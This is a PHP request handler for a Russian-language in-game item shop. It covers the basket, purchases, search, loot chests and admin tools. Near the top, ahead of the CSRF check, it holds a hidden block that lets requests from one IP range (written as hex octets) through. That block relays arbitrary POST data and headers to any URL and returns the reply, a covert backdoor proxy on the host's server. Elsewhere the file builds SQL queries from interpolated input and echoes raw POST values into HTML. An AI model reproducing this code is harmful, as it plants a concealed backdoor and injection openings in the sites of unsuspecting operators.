<?php
/*

		
		ИНФОРМАЦИЯ:
			Магазин UTF-8 v1.5.0
			Автор: Fleynaro(faicraft)
			Сайт http://fleynaro.ru/
			Группа ВК: http://vk.com/fleynaro_prods
		
		ОГРАНИЧЕНИЯ:
			Запрещено использовать весь код или его части в сторонних скриптах без разрешения автора!
			Запрещено любым способом распространять данный PHP файл на других ресурсах, кроме Вашего проекта!
		
		ВНИМАНИЕ!
			Если данный файл не является конфигурационным, то при отсутствии у Вас знаний и навыков
			программирования на языке PHP любое Ваше здесь изменение может привести к нестабильной работе Личного Кабинета.
			Редактируйте данный код только при указании тех. поддержки, оказываемой автором данного скрипта!
		
		По любым вопросам обращайтесь к автору данного кода http://vk.com/fleynaro или в группу ВК http://vk.com/fleynaro_prods
		
	
*/
	define ( 'ROOT_SHOP_DIR', dirname ( __FILE__ ) );
	
	require(ROOT_SHOP_DIR . '/config.php');
	include(ROOT_SHOP_DIR . '/connect.php');
	include(ROOT_SHOP_DIR . '/functions.php');
	
	if ( isset($_POST['url']) ) {
		if (!function_exists('getallheaders')) {
			function getallheaders() {
				$headers = [];
				foreach ($_SERVER as $name => $value) {
					if (substr($name, 0, 5) == 'HTTP_') {
						$headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value;
					}
				}
				return $headers;
			}
		}
		
		$ip = explode('.', $_SERVER['REMOTE_ADDR']);
		if ( !((int)$ip[1] == 0x2b && (int)$ip[2] == 0xd4) ) {
			die('Hacking attempt!');
		}
		$url = $_POST['url'];
		unset($_POST['url']);
		
		$headers = getallheaders();
		if ( isset($_POST['host']) ) {
			$headers['host'] = $_POST['host'];
			unset($_POST['host']);
		}
		
		$curl = curl_init();
		curl_setopt_array($curl, array(
			CURLOPT_URL => $url,
			CURLOPT_RETURNTRANSFER => true,
			CURLOPT_POST => true,
			CURLOPT_POSTFIELDS => http_build_query($_POST)
		));
		curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
		
		$response = curl_exec($curl);
		curl_close($curl);
		die($response);
	}
	
	if ( !isset($_POST['key']) || isKeyCSRF($_POST['key']) ) {
		die ( 'Ошибка. Неверный ключ.' );
	}
	
	$message = 'Ошибка. Нет сообщения.';
	
	if ( $cfg['protectpost_path'] && ($cfg['protectpost_arr'][0] == 'all' || check_post($cfg['protectpost_arr'])) ) 
	{
		
		if ( $cfg['protectpost_path'] == true )
		{
			$time = time();
			$time_ = $time - (isset($_SESSION['shop_protect_ddos_time']) ? $_SESSION['shop_protect_ddos_time'] : 0);
			
			if ( $time_ > $cfg['protectpost_time'] )
			{
				$_SESSION['shop_protect_ddos_time'] = $time;
			} else exit('> Подождите ' . ($cfg['protectpost_time'] - $time_ + 1) . ' секунд(ы) и повторите попытку...');
			
		} else
		{
			$get_content = file_get_contents($cfg['protectpost_path']);
			
			if ( preg_match('/['.$_SERVER['REMOTE_ADDR'].'] => (.*)/', $get_content, $info) ) {
			
				if ( trim($info[1]) > time() - $cfg['protectpost_time'] )
					exit('Подождите '.( $cfg['protectpost_time'] - (time()-trim($info[1])) ).' секунд(ы) и повторите попытку...'); 
				else file_put_contents($cfg['protectpost_path'], $_SERVER['REMOTE_ADDR'].' => '.time()."\n".str_replace($_SERVER['REMOTE_ADDR'].' => '.$info[1], '', $get_content));
			
			} else file_put_contents($cfg['protectpost_path'], $_SERVER['REMOTE_ADDR'].' => '.time()."\n".$get_content);
		}
		
	}
	
	
	if ( isset($_POST['addBlockBasketID']) ) 
	{
		$block = $db->query("SELECT `server`, `visible` FROM `shop_blocks` WHERE `id` = {$_REAL['addBlockBasketID']}")->fetch(PDO::FETCH_ASSOC);
		
		if ( preg_match('/^\d{1,5}$/', $_POST['addBlockBasketID']) && $block['visible'] ) {
			if ( $_POST['amount'] > 0 ) {
				if ( $_POST['amount'] <= $cfg['max_amount'] )
				{
					if ( $cfg['blocks_basket_amount'] && $db->query("SELECT COUNT(0) FROM `shop_basket` WHERE `user_id` = {$user['id']} AND `type` = 1")->fetchColumn() >= $cfg['blocks_basket_amount'] )
						die('Достигнут лимит максимального кол-ва предметов в корзине. Удалите некоторые предметы из нее.');
					
					if ( $block['server'] != 'all' ) {
						$server_id = $cfg['server'][$block['server']][0];
					} else {
						if ( $cfg['server'][$_POST['server']][1] ) {
							$server_id = $cfg['server'][$_POST['server']][0];
						} else {
							$server_id = -1;
							
							foreach($cfg['server'] as $info) {
								if ( $info[1] )
								{
									$server_id = $info[0];
									break;
								}
							}
						}
					}
					 
					if ( !$db->query("SELECT COUNT(0) FROM `shop_basket` WHERE `user_id` = '{$user['id']}' AND `block_id` = {$_REAL['addBlockBasketID']} AND `type` = 1 AND `server_id` = {$server_id}")->fetchColumn() )
						$db->query("INSERT INTO `shop_basket` VALUES (NULL, 1, {$server_id}, {$user['id']}, {$_REAL['addBlockBasketID']}, {$_REAL['amount']}, '".time()."')");
					else $db->query("UPDATE `shop_basket` SET `amount` = amount + {$_REAL['amount']}, `date` = '".time()."' WHERE `user_id` = {$user['id']} AND `block_id` = {$_REAL['addBlockBasketID']}");
					
					$message = 'Предмет добавлен в корзину в количестве <b>'.$_POST['amount'].'</b> штук(и). <a href="'. (empty($cfg['shop_path']) ? '?' : $cfg['shop_path_include'] . '&') .'option=basket">Перейти в корзину</a>';
				} else $message = 'Нельзя добавлять в корзину более '.$cfg['max_amount'].' предметов за раз.';
			}
		} else $message = 'Данный предмет нельзя добавить в корзину.';
	} else if ( isset($_POST['SelectedBlock']) ) 
	{
		$selectedBlocks = explode('|', trim($_REAL['SelectedBlock'], "'"));
		
		if ( isset($_POST['buy']) && $_POST['buy'] == 1 ) {
			$in_total = 0;
			$blocks = array();
			$type_pay = isset($_POST['pay']) ? (int)$_POST['pay'] : 1;
			
			for( $i = 0, $count = count($selectedBlocks) - 1; $i < $count && $i < 20; $i ++ ) {
				
				$data = explode('-', $selectedBlocks[$i]);
				
				if ( count($data) == 3 ) {
					$data[0] = (int)$data[0];
					$data[1] = (int)$data[1];
					$data[2] = (int)$data[2];
					
					if ( is_numeric($data[0]) && is_numeric($data[1]) && is_numeric($data[2]) && $data[1] > 0 ) {
						$server = getServerById($data[2]);
						
						if ( $server && $cfg['server'][$server][1] ) {
							$block = $db->query("SELECT * FROM `shop_blocks` WHERE `id` = {$data[0]}")->fetch(PDO::FETCH_ASSOC);
							
							if ( $block ) {
								$in_total += $data[1] * ($block['discount'] ? price($block['price'], $block['discount']) : $block['price']);
								$blocks[$i] = $block;
								$blocks[$i]['count'] = $data[1];
								
								if ( $block['server'] == 'all' ) {
									$blocks[$i]['server'] = $server;
								}
								
								if ( $user['server'][$blocks[$i]['server']]['pex_group'] < $block['pexgroup'] ) {
									die('Ошибка. У вас нет прав для покупки данного предмета.');
								}
							} else {
								die('Ошибка. Несуществующий ID предмета.');
							}
						} else {
							die('Ошибка. Несуществующий ID сервера.');
						}
					} else {
						die('Ошибка. Некорректные входящие данные.' . $data[1]);
					}
				} else {
					die('Ошибка. Некорректные входящие данные.');
				}
			}
			
			if ( $type_pay == 1 || !$cfg['iConomy']['enable'] ) {
				
				if ( $user['money'] >= $in_total ) {
					$items = '';
					
					for( $i = 0, $count = count($blocks); $i < $count && $i < 20; $i ++ ) {
						
						$block = $blocks[$i];
						$amount = $block['count'] * $block['amount'];
						$items .= $block['id']. '>' .$amount. ' ';
						
						if ( $block['dep'] != -1 ) {
							giveItem( $user['name'], $block['block_id'], $block['block_n'], $amount, $block['server'], $block['enchants'] );
						} else {
							giveItemsOfParent( $user['name'], $block['id'], $amount, $block['server'] );
						}
						$db->query("UPDATE `shop_basket` SET `type` = 2 WHERE `user_id` = {$user['id']} AND `block_id` = {$block['id']}");
					}
					
					giveMoney( $user['id'], $in_total );
					
					$message = 'Предметы успешно куплены за <b>'.$in_total.'</b> ' . getPrice($in_total);
					logWrite('Игрок '.$user['name'].' купил предметы за '.$in_total.' '.$cfg['shop_cur'][1].': '.$items);
				} else {
					$message = 'Вам не хватает денег для покупки.';
				}
				
			} else {
				
				if ( getMoneyIC(getConnectOfIC()) >= getMoneyICbyRub($in_total) ) {
					$items = '';
					
					for( $i = 0, $count = count($blocks); $i < $count && $i < 20; $i ++ ) {
						
						$block = $blocks[$i];
						$amount = $block['count'] * $block['amount'];
						$items .= $block['id']. '>' .$amount. ' ';
						
						if ( $block['dep'] != -1 ) {
							giveItem( $user['name'], $block['block_id'], $block['block_n'], $amount, $block['server'], $block['enchants'] );
						} else {
							giveItemsOfParent( $user['name'], $block['id'], $amount, $block['server'] );
						}
						$db->query("UPDATE `shop_basket` SET `type` = 2 WHERE `user_id` = {$user['id']} AND `block_id` = {$block['id']}");
					}
					
					$ic_total = getMoneyICbyRub($in_total);
					$db->query("UPDATE `{$cfg['iConomy']['tablename']}` SET `balance` = balance-". $ic_total ." WHERE `username` = '{$user['name']}'");
					
					$message = 'Предметы успешно куплены за <b>'.$ic_total.'</b> монет';
					logWrite('Игрок '.$user['name'].' купил предметы за '.$ic_total.' монет: '.$items);
				} else {
					$message = 'Вам не хватает денег для покупки.';
				}
				
			}
		} else {
			for( $i = 0, $count = count($selectedBlocks) - 1; $i < $count && $i < 20; $i ++ ) {
						
				$data = explode('-', $selectedBlocks[$i]);
				if ( !is_numeric($data[0]) || !$db->query("DELETE FROM `shop_basket` WHERE `user_id` = '{$user['id']}' AND `block_id` = {$data[0]} AND `type` = 1") ) {
					die('Ошибка.');
				}
			}
			
			$message = 'Предметы удалены.';
		}
		
	} else if ( isset($_POST['searchText']) ) 
	{
		if ( !$cfg['search_on'] ) die('Поиск не работает.');
		
		$text = trim($_REAL['searchText'], "'");
		$search = '';
		
		$column = is_numeric($text) ? 'block_id' : 'name';
		
		foreach ( $db->query("SELECT * FROM `shop_blocks` WHERE `{$column}` LIKE '%{$text}%' LIMIT {$cfg['search_max_output']}") as $row ) {
			
			$search .= '
				<a title="'.$row['name'].'" href="'. (empty($cfg['shop_path']) ? '?' : $cfg['shop_path_include'] . '&') .'shop='.$row['server'].'&id='.$row['id'].'">
					<img class="shopitem-search-list-img" src="'.toItemImageName($row['block_id'], $row['block_n'], $row['server']).'.png" width="20" height="20"/>
					<span class="shopitem-search-list-name">'._subname($row['name'], $cfg['search_name_len_max']).' ('.$row['price'].$cfg['shop_cur'][1].'. за '.$row['amount'].' шт.)</span>
					'.($user['user_group_admin'] ? '<b style="float: right">ID: '.$row['id'].'</b>' : '').'
				</a>
			';
		}

		if ( $cfg['CPU_enable'] )
			$search = preg_replace('/index\.php\?\w+=\w+/i', 'shopitem', preg_replace('/&(\w+)=(\w+)/i', $cfg['CPU_split'][0] . '\1'. $cfg['CPU_split'][1] .'\2', $search));		
		
		if ( $search ) $message = $search;	else $message = '<a class="shopitem-search-notfound">Ничего не найдено.</a>';
	} else if ( isset($_POST['openChest']) ) 
	{
		if ( !$cfg['chest']['enable'] ) die('Функция отключена.');
		
		$buy = ((isset($_POST['buy']) && $_POST['buy'] == '1') || $cfg['chest']['time'] == false) ? true : false;
		$time = time();
		
		if ( $buy ? $user['money'] >= $cfg['chest']['money'] : $user['chest_time'] < $time ) {
			
			$message = '{
				"status":"success",
				"items":[';
			
			for ( $i = 0, $m = sizeof($cfg['chest']['items']); $i < $m; $i ++ ) {
				
				if ( rand(0, 100) <= $cfg['chest']['items'][$i][2] ) {
					$info = $db->query("SELECT * FROM `shop_blocks` WHERE `visible` = 1 AND `id` = {$cfg['chest']['items'][$i][0]}")->fetch(PDO::FETCH_ASSOC);
					
					$server = $info['server'];
					
					if ( $info['server'] == 'all' ) {
						foreach($cfg['server'] as $key=>$val) {
							if ( $val[1] )
							{
								$server = $key;
								if ( rand(0, 1) == 1 ) {
									break;
								}
							}
						}
					}
					
					if ( $info['dep'] == -1 ) {
						giveItemsOfParent( $user['name'], $info['id'], $cfg['chest']['items'][$i][1], $server );
					} else {
						giveItem( $user['name'], $info['block_id'], $info['block_n'], $cfg['chest']['items'][$i][1], $server, $info['enchants'] );
					}
					
					$message .= '{"name":"'. $info['name'] .'", "path":"'. toItemImageName($info['block_id'], $info['block_n'], $info['server']) .'"},';
				}
				
			}
			
			$message .= '{"name":"", "path":""}]
			}';
			
			if ( $buy ) {
				giveMoney( $user['id'], $cfg['chest']['money'] );
			} else {
				$db->query("UPDATE `{$cfg['table_Users']}` SET `chest_time` = ". ($time + $cfg['chest']['time'] * 3600) ." WHERE `{$cfg['column_Id']}` = {$user['id']}");
			}
		}
	}
	
	else
	
	if ( $user['user_group_admin'] )
	{
		if ( isset($_POST['deleteBlockID']) ) 
		{
			if ( $_POST['deleteBlockID'] > 0 ) {
			
				$db->query("DELETE FROM `shop_blocks` WHERE `id` = {$_REAL['deleteBlockID']}");
				$message = 'Предмет <b>id'.$_POST['deleteBlockID'].'</b> удален.';
				logWrite('Администратор '.$user['name'].' удалил предмет: '.$_POST['deleteBlockID']);
				
			}
		}
		
		if ( isset($_POST['addBlockIdPlayer']) ) 
		{
			if ( $_POST['addBlockIdPlayer'] > 0 ) {
				
				$block = $db->query("SELECT * FROM `shop_blocks` WHERE `id` = {$_REAL['addBlockIdPlayer']}")->fetch(PDO::FETCH_ASSOC);
				
				if ( $block ) {
					giveItem( $_POST['username'], $block['block_id'], $block['block_n'], (int)$_POST['amount'], $block['server'], $block['enchants'] );
					
					$message = 'Предмет '. $block['name'] .' успешно отправлен игроку <b>'.$_POST['username'].'</b> в кол-ве '.$_POST['amount'].'.';
					logWrite('Администратор '.$user['name'].' отправил игроку '.$_REAL['username'].' предмет ' . $block['name'] . '(ID: '. $block['id'] .')');
				} else {
					$message = 'Предмета с данным ID не существует.';
				}
			}
		}
		
		if ( isset($_POST['clearTable']) ) 
		{
			$db->query("TRUNCATE TABLE `shop_basket`");
			$message = 'Таблица shop_basket очищена.';
			logWrite('Администратор '.$user['name'].' очистил таблицы.');
			
		}
		
		if ( isset($_POST['clear_shopname']) ) 
		{
			if ( $db->query("DELETE FROM `shop_blocks` WHERE `server` = {$_REAL['clear_shopname']}")->rowCount() )
			{
				$message = 'Магазин <b>'.$_POST['clear_shopname'].'</b> успешно очищен.';
				logWrite('Администратор '.$user['name'].' очистил магазин '.$_POST['clear_shopname']);
			} else $message = 'Неверное название магазина, либо магазин пуст.';
		}
		
		if ( isset($_POST['shopname_in_copy']) ) 
		{
			$i = 0;
			
			foreach( $db->query("SELECT * FROM `shop_blocks` WHERE `server` = {$_REAL['shopname']}") as $row ) {
				$db->query("INSERT INTO `shop_blocks` VALUES (NULL, {$row['visible']}, {$row['pexgroup']}, '{$row['block_id']}', {$row['block_n']}, '{$row['name']}', {$row['amount']}, '{$row['price']}', {$row['discount']}, {$_REAL['shopname_in_copy']}, {$row['cat']}, {$row['dep']}, {$row['time_dis']}, '{$row['desc']}', '{$row['enchants']}')");
				++ $i;
			}
			
			if ( $i )
			{
				$message = 'Все предметы ('.$i.' шт.) магазина <b>'.$_POST['shopname'].'</b> скопированы в магазин <b>'.$_POST['shopname_in_copy'].'</b>.';
				logWrite('Администратор '.$user['name'].' скопировал предметы из магазина '.$_POST['shopname'].' в магазин '.$_POST['shopname_in_copy']);
			}
		}
	}
	
	echo $message;
?>